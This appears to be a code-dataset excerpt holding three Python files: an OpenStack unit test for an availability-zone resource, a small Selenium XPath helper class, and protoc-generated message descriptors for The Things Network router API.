# License for the specific language governing permissions and limitations
# under the License.
from openstack.shared_file_system.v2 import availability_zone as az
from openstack.tests.unit import base
IDENTIFIER = '08a87d37-5ca2-4308-86c5-cba06d8d796c'
EXAMPLE = {
"id": IDENTIFIER,
"name": "nova",
"created_at": "2021-01-21T20:13:55.000000",
"updated_at": None,
}
class TestAvailabilityZone(base.TestCase):
    """Unit tests for the shared-file-system AvailabilityZone resource."""
    def test_basic(self):
        # Resource metadata: collection key, endpoint path, allowed ops.
        sot = az.AvailabilityZone()
        self.assertEqual('availability_zones', sot.resources_key)
        self.assertEqual('/availability-zones', sot.base_path)
        self.assertTrue(sot.allow_list)
    def test_make_availability_zone(self):
        # Every field of EXAMPLE must round-trip through the constructor.
        sot = az.AvailabilityZone(**EXAMPLE)
        for attr in ('id', 'name', 'created_at', 'updated_at'):
            self.assertEqual(EXAMPLE[attr], getattr(sot, attr))
| 567 | 21 | 77 |
7dc52c336a973436d4ce90d93fc46438921715e3 | 496 | py | Python | helper.py | peitaosu/Widowmaker | 60878a748d356c1402e85dec31c9c0d453e16b9c | [
"MIT"
] | 1 | 2017-10-25T14:07:21.000Z | 2017-10-25T14:07:21.000Z | helper.py | peitaosu/Widowmaker | 60878a748d356c1402e85dec31c9c0d453e16b9c | [
"MIT"
] | null | null | null | helper.py | peitaosu/Widowmaker | 60878a748d356c1402e85dec31c9c0d453e16b9c | [
"MIT"
] | null | null | null | from selenium import webdriver | 27.555556 | 60 | 0.655242 | from selenium import webdriver
class Helper():
    """Thin wrapper around a Selenium Chrome driver for XPath lookups."""
    def __init__(self):
        self.driver = webdriver.Chrome()
    def get_element_by_xpath(self, page, xpath):
        """Load *page* and return the first element matching *xpath*."""
        self.driver.get(page)
        return self.driver.find_element_by_xpath(xpath)
    def get_elements_by_xpath(self, page, xpath):
        """Load *page* and return all elements matching *xpath*."""
        self.driver.get(page)
        return self.driver.find_elements_by_xpath(xpath)
    def quit(self):
        """Shut down the underlying browser."""
        self.driver.quit()
59869c8e260a4f2ae332b76f9bc7fec63da9713e | 29,525 | py | Python | python/github_com/TheThingsNetwork/api/router/router_pb2.py | LukasHabring/api | 9e3da3462f14dab4c45fa38b03335e85e1970833 | [
"MIT"
] | 14 | 2017-07-14T16:11:54.000Z | 2021-11-16T12:35:37.000Z | python/github_com/TheThingsNetwork/api/router/router_pb2.py | LukasHabring/api | 9e3da3462f14dab4c45fa38b03335e85e1970833 | [
"MIT"
] | 34 | 2017-07-14T15:15:13.000Z | 2021-08-18T10:08:10.000Z | python/github_com/TheThingsNetwork/api/router/router_pb2.py | LukasHabring/api | 9e3da3462f14dab4c45fa38b03335e85e1970833 | [
"MIT"
] | 12 | 2017-07-25T16:13:16.000Z | 2021-05-08T07:21:50.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: github.com/TheThingsNetwork/api/router/router.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from github_com.TheThingsNetwork.api import api_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2
from github_com.TheThingsNetwork.api.protocol import protocol_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2
from github_com.TheThingsNetwork.api.gateway import gateway_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2
from github_com.TheThingsNetwork.api.trace import trace_pb2 as github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='github.com/TheThingsNetwork/api/router/router.proto',
package='router',
syntax='proto3',
serialized_options=b'\n\037org.thethingsnetwork.api.routerB\013RouterProtoP\001Z&github.com/TheThingsNetwork/api/router\252\002\033TheThingsNetwork.API.Router',
serialized_pb=b'\n3github.com/TheThingsNetwork/api/router/router.proto\x12\x06router\x1a\x1bgoogle/protobuf/empty.proto\x1a-github.com/gogo/protobuf/gogoproto/gogo.proto\x1a)github.com/TheThingsNetwork/api/api.proto\x1a\x37github.com/TheThingsNetwork/api/protocol/protocol.proto\x1a\x35github.com/TheThingsNetwork/api/gateway/gateway.proto\x1a\x31github.com/TheThingsNetwork/api/trace/trace.proto\"\x12\n\x10SubscribeRequest\"\xcd\x01\n\rUplinkMessage\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12\x35\n\x11protocol_metadata\x18\x0b \x01(\x0b\x32\x14.protocol.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x33\n\x10gateway_metadata\x18\x0c \x01(\x0b\x32\x13.gateway.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x1b\n\x05trace\x18\x15 \x01(\x0b\x32\x0c.trace.Trace\"\xe3\x01\n\x0f\x44ownlinkMessage\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12?\n\x16protocol_configuration\x18\x0b \x01(\x0b\x32\x19.protocol.TxConfigurationB\x04\xc8\xde\x1f\x00\x12=\n\x15gateway_configuration\x18\x0c \x01(\x0b\x32\x18.gateway.TxConfigurationB\x04\xc8\xde\x1f\x00\x12\x1b\n\x05trace\x18\x15 \x01(\x0b\x32\x0c.trace.Trace\"\xbe\x03\n\x17\x44\x65viceActivationRequest\x12\x0f\n\x07payload\x18\x01 \x01(\x0c\x12\"\n\x07message\x18\x02 \x01(\x0b\x32\x11.protocol.Message\x12T\n\x07\x64\x65v_eui\x18\x0b \x01(\x0c\x42\x43\xe2\xde\x1f\x06\x44\x65vEUI\xc8\xde\x1f\x00\xda\xde\x1f\x31github.com/TheThingsNetwork/ttn/core/types.DevEUI\x12T\n\x07\x61pp_eui\x18\x0c \x01(\x0c\x42\x43\xe2\xde\x1f\x06\x41ppEUI\xc8\xde\x1f\x00\xda\xde\x1f\x31github.com/TheThingsNetwork/ttn/core/types.AppEUI\x12\x35\n\x11protocol_metadata\x18\x15 \x01(\x0b\x32\x14.protocol.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x33\n\x10gateway_metadata\x18\x16 \x01(\x0b\x32\x13.gateway.RxMetadataB\x04\xc8\xde\x1f\x00\x12\x39\n\x13\x61\x63tivation_metadata\x18\x17 \x01(\x0b\x32\x1c.protocol.ActivationMetadata\x12\x1b\n\x05trace\x18\x1f 
\x01(\x0b\x32\x0c.trace.Trace\"\x1a\n\x18\x44\x65viceActivationResponse\"9\n\x14GatewayStatusRequest\x12!\n\ngateway_id\x18\x01 \x01(\tB\r\xe2\xde\x1f\tGatewayID\"Q\n\x15GatewayStatusResponse\x12\x11\n\tlast_seen\x18\x01 \x01(\x03\x12%\n\x06status\x18\x02 \x01(\x0b\x32\x0f.gateway.StatusB\x04\xc8\xde\x1f\x00\"\x0f\n\rStatusRequest\"\x88\x02\n\x06Status\x12 \n\x06system\x18\x01 \x01(\x0b\x32\x10.api.SystemStats\x12&\n\tcomponent\x18\x02 \x01(\x0b\x32\x13.api.ComponentStats\x12\"\n\x0egateway_status\x18\x0b \x01(\x0b\x32\n.api.Rates\x12\x1a\n\x06uplink\x18\x0c \x01(\x0b\x32\n.api.Rates\x12\x1c\n\x08\x64ownlink\x18\r \x01(\x0b\x32\n.api.Rates\x12\x1f\n\x0b\x61\x63tivations\x18\x0e \x01(\x0b\x32\n.api.Rates\x12\x1a\n\x12\x63onnected_gateways\x18\x15 \x01(\r\x12\x19\n\x11\x63onnected_brokers\x18\x16 \x01(\r2\x90\x02\n\x06Router\x12:\n\rGatewayStatus\x12\x0f.gateway.Status\x1a\x16.google.protobuf.Empty(\x01\x12\x39\n\x06Uplink\x12\x15.router.UplinkMessage\x1a\x16.google.protobuf.Empty(\x01\x12@\n\tSubscribe\x12\x18.router.SubscribeRequest\x1a\x17.router.DownlinkMessage0\x01\x12M\n\x08\x41\x63tivate\x12\x1f.router.DeviceActivationRequest\x1a .router.DeviceActivationResponse2\x91\x01\n\rRouterManager\x12L\n\rGatewayStatus\x12\x1c.router.GatewayStatusRequest\x1a\x1d.router.GatewayStatusResponse\x12\x32\n\tGetStatus\x12\x15.router.StatusRequest\x1a\x0e.router.StatusBv\n\x1forg.thethingsnetwork.api.routerB\x0bRouterProtoP\x01Z&github.com/TheThingsNetwork/api/router\xaa\x02\x1bTheThingsNetwork.API.Routerb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2.DESCRIPTOR,github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2.DESCRIPTOR,])
# --- Generated message descriptors (protoc output; do not hand-edit logic). ---
# Field numbers and wire types below mirror router.proto; serialized_start/end
# are byte offsets into the file's serialized descriptor blob.

# router.SubscribeRequest: empty request message (no fields).
_SUBSCRIBEREQUEST = _descriptor.Descriptor(
  name='SubscribeRequest',
  full_name='router.SubscribeRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=345,
  serialized_end=363,
)

# router.UplinkMessage: raw payload bytes plus decoded message and the
# protocol/gateway RX metadata (gogoproto "nullable=false" options) and trace.
_UPLINKMESSAGE = _descriptor.Descriptor(
  name='UplinkMessage',
  full_name='router.UplinkMessage',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='payload', full_name='router.UplinkMessage.payload', index=0,
      number=1, type=12, cpp_type=9, label=1,
      has_default_value=False, default_value=b"",
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='message', full_name='router.UplinkMessage.message', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='protocol_metadata', full_name='router.UplinkMessage.protocol_metadata', index=2,
      number=11, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='gateway_metadata', full_name='router.UplinkMessage.gateway_metadata', index=3,
      number=12, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='trace', full_name='router.UplinkMessage.trace', index=4,
      number=21, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=366,
  serialized_end=571,
)

# router.DownlinkMessage: mirror of UplinkMessage for the downlink direction,
# carrying TX configurations instead of RX metadata.
_DOWNLINKMESSAGE = _descriptor.Descriptor(
  name='DownlinkMessage',
  full_name='router.DownlinkMessage',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='payload', full_name='router.DownlinkMessage.payload', index=0,
      number=1, type=12, cpp_type=9, label=1,
      has_default_value=False, default_value=b"",
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='message', full_name='router.DownlinkMessage.message', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='protocol_configuration', full_name='router.DownlinkMessage.protocol_configuration', index=2,
      number=11, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='gateway_configuration', full_name='router.DownlinkMessage.gateway_configuration', index=3,
      number=12, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='trace', full_name='router.DownlinkMessage.trace', index=4,
      number=21, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=574,
  serialized_end=801,
)
# router.DeviceActivationRequest: join/activation uplink. dev_eui/app_eui are
# 8-byte EUIs carrying gogoproto customname/customtype options that map them to
# the ttn core types in generated Go code.
_DEVICEACTIVATIONREQUEST = _descriptor.Descriptor(
  name='DeviceActivationRequest',
  full_name='router.DeviceActivationRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='payload', full_name='router.DeviceActivationRequest.payload', index=0,
      number=1, type=12, cpp_type=9, label=1,
      has_default_value=False, default_value=b"",
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='message', full_name='router.DeviceActivationRequest.message', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='dev_eui', full_name='router.DeviceActivationRequest.dev_eui', index=2,
      number=11, type=12, cpp_type=9, label=1,
      has_default_value=False, default_value=b"",
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=b'\342\336\037\006DevEUI\310\336\037\000\332\336\0371github.com/TheThingsNetwork/ttn/core/types.DevEUI', file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='app_eui', full_name='router.DeviceActivationRequest.app_eui', index=3,
      number=12, type=12, cpp_type=9, label=1,
      has_default_value=False, default_value=b"",
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=b'\342\336\037\006AppEUI\310\336\037\000\332\336\0371github.com/TheThingsNetwork/ttn/core/types.AppEUI', file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='protocol_metadata', full_name='router.DeviceActivationRequest.protocol_metadata', index=4,
      number=21, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='gateway_metadata', full_name='router.DeviceActivationRequest.gateway_metadata', index=5,
      number=22, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='activation_metadata', full_name='router.DeviceActivationRequest.activation_metadata', index=6,
      number=23, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='trace', full_name='router.DeviceActivationRequest.trace', index=7,
      number=31, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=804,
  serialized_end=1250,
)

# router.DeviceActivationResponse: empty response message (no fields).
_DEVICEACTIVATIONRESPONSE = _descriptor.Descriptor(
  name='DeviceActivationResponse',
  full_name='router.DeviceActivationResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1252,
  serialized_end=1278,
)

# router.GatewayStatusRequest: single string field selecting a gateway
# (gogoproto customname "GatewayID").
_GATEWAYSTATUSREQUEST = _descriptor.Descriptor(
  name='GatewayStatusRequest',
  full_name='router.GatewayStatusRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='gateway_id', full_name='router.GatewayStatusRequest.gateway_id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=b'\342\336\037\tGatewayID', file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1280,
  serialized_end=1337,
)
# router.GatewayStatusResponse: int64 last_seen timestamp plus an embedded
# (non-nullable, per gogoproto option bytes) gateway.Status message.
_GATEWAYSTATUSRESPONSE = _descriptor.Descriptor(
  name='GatewayStatusResponse',
  full_name='router.GatewayStatusResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='last_seen', full_name='router.GatewayStatusResponse.last_seen', index=0,
      number=1, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='status', full_name='router.GatewayStatusResponse.status', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=b'\310\336\037\000', file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1339,
  serialized_end=1420,
)

# router.StatusRequest: empty request message (no fields).
_STATUSREQUEST = _descriptor.Descriptor(
  name='StatusRequest',
  full_name='router.StatusRequest',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1422,
  serialized_end=1437,
)

# router.Status: router health/metrics snapshot — system/component stats,
# per-stream api.Rates messages, and two uint32 connection counters.
_STATUS = _descriptor.Descriptor(
  name='Status',
  full_name='router.Status',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='system', full_name='router.Status.system', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='component', full_name='router.Status.component', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='gateway_status', full_name='router.Status.gateway_status', index=2,
      number=11, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='uplink', full_name='router.Status.uplink', index=3,
      number=12, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='downlink', full_name='router.Status.downlink', index=4,
      number=13, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='activations', full_name='router.Status.activations', index=5,
      number=14, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='connected_gateways', full_name='router.Status.connected_gateways', index=6,
      number=21, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
    _descriptor.FieldDescriptor(
      name='connected_brokers', full_name='router.Status.connected_brokers', index=7,
      number=22, type=13, cpp_type=3, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=1440,
  serialized_end=1704,
)
# Wire each message-typed field to the Descriptor of its target message
# (defined here or in the imported api/protocol/gateway/trace _pb2 modules),
# then register every message type and the file descriptor with the default
# symbol database so reflection/lookup works.
_UPLINKMESSAGE.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_UPLINKMESSAGE.fields_by_name['protocol_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._RXMETADATA
_UPLINKMESSAGE.fields_by_name['gateway_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._RXMETADATA
_UPLINKMESSAGE.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_DOWNLINKMESSAGE.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_DOWNLINKMESSAGE.fields_by_name['protocol_configuration'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._TXCONFIGURATION
_DOWNLINKMESSAGE.fields_by_name['gateway_configuration'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._TXCONFIGURATION
_DOWNLINKMESSAGE.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_DEVICEACTIVATIONREQUEST.fields_by_name['message'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._MESSAGE
_DEVICEACTIVATIONREQUEST.fields_by_name['protocol_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._RXMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['gateway_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._RXMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['activation_metadata'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_protocol_dot_protocol__pb2._ACTIVATIONMETADATA
_DEVICEACTIVATIONREQUEST.fields_by_name['trace'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_trace_dot_trace__pb2._TRACE
_GATEWAYSTATUSRESPONSE.fields_by_name['status'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2._STATUS
_STATUS.fields_by_name['system'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._SYSTEMSTATS
_STATUS.fields_by_name['component'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._COMPONENTSTATS
_STATUS.fields_by_name['gateway_status'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['uplink'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['downlink'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
_STATUS.fields_by_name['activations'].message_type = github_dot_com_dot_TheThingsNetwork_dot_api_dot_api__pb2._RATES
DESCRIPTOR.message_types_by_name['SubscribeRequest'] = _SUBSCRIBEREQUEST
DESCRIPTOR.message_types_by_name['UplinkMessage'] = _UPLINKMESSAGE
DESCRIPTOR.message_types_by_name['DownlinkMessage'] = _DOWNLINKMESSAGE
DESCRIPTOR.message_types_by_name['DeviceActivationRequest'] = _DEVICEACTIVATIONREQUEST
DESCRIPTOR.message_types_by_name['DeviceActivationResponse'] = _DEVICEACTIVATIONRESPONSE
DESCRIPTOR.message_types_by_name['GatewayStatusRequest'] = _GATEWAYSTATUSREQUEST
DESCRIPTOR.message_types_by_name['GatewayStatusResponse'] = _GATEWAYSTATUSRESPONSE
DESCRIPTOR.message_types_by_name['StatusRequest'] = _STATUSREQUEST
DESCRIPTOR.message_types_by_name['Status'] = _STATUS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Build the concrete, importable message classes from the descriptors above
# via reflection, and register each with the symbol database.
SubscribeRequest = _reflection.GeneratedProtocolMessageType('SubscribeRequest', (_message.Message,), {
  'DESCRIPTOR' : _SUBSCRIBEREQUEST,
  '__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
  # @@protoc_insertion_point(class_scope:router.SubscribeRequest)
  })
_sym_db.RegisterMessage(SubscribeRequest)
UplinkMessage = _reflection.GeneratedProtocolMessageType('UplinkMessage', (_message.Message,), {
  'DESCRIPTOR' : _UPLINKMESSAGE,
  '__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
  # @@protoc_insertion_point(class_scope:router.UplinkMessage)
  })
_sym_db.RegisterMessage(UplinkMessage)
DownlinkMessage = _reflection.GeneratedProtocolMessageType('DownlinkMessage', (_message.Message,), {
  'DESCRIPTOR' : _DOWNLINKMESSAGE,
  '__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
  # @@protoc_insertion_point(class_scope:router.DownlinkMessage)
  })
_sym_db.RegisterMessage(DownlinkMessage)
DeviceActivationRequest = _reflection.GeneratedProtocolMessageType('DeviceActivationRequest', (_message.Message,), {
  'DESCRIPTOR' : _DEVICEACTIVATIONREQUEST,
  '__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
  # @@protoc_insertion_point(class_scope:router.DeviceActivationRequest)
  })
_sym_db.RegisterMessage(DeviceActivationRequest)
DeviceActivationResponse = _reflection.GeneratedProtocolMessageType('DeviceActivationResponse', (_message.Message,), {
  'DESCRIPTOR' : _DEVICEACTIVATIONRESPONSE,
  '__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
  # @@protoc_insertion_point(class_scope:router.DeviceActivationResponse)
  })
_sym_db.RegisterMessage(DeviceActivationResponse)
GatewayStatusRequest = _reflection.GeneratedProtocolMessageType('GatewayStatusRequest', (_message.Message,), {
  'DESCRIPTOR' : _GATEWAYSTATUSREQUEST,
  '__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
  # @@protoc_insertion_point(class_scope:router.GatewayStatusRequest)
  })
_sym_db.RegisterMessage(GatewayStatusRequest)
GatewayStatusResponse = _reflection.GeneratedProtocolMessageType('GatewayStatusResponse', (_message.Message,), {
  'DESCRIPTOR' : _GATEWAYSTATUSRESPONSE,
  '__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
  # @@protoc_insertion_point(class_scope:router.GatewayStatusResponse)
  })
_sym_db.RegisterMessage(GatewayStatusResponse)
StatusRequest = _reflection.GeneratedProtocolMessageType('StatusRequest', (_message.Message,), {
  'DESCRIPTOR' : _STATUSREQUEST,
  '__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
  # @@protoc_insertion_point(class_scope:router.StatusRequest)
  })
_sym_db.RegisterMessage(StatusRequest)
Status = _reflection.GeneratedProtocolMessageType('Status', (_message.Message,), {
  'DESCRIPTOR' : _STATUS,
  '__module__' : 'github.com.TheThingsNetwork.api.router.router_pb2'
  # @@protoc_insertion_point(class_scope:router.Status)
  })
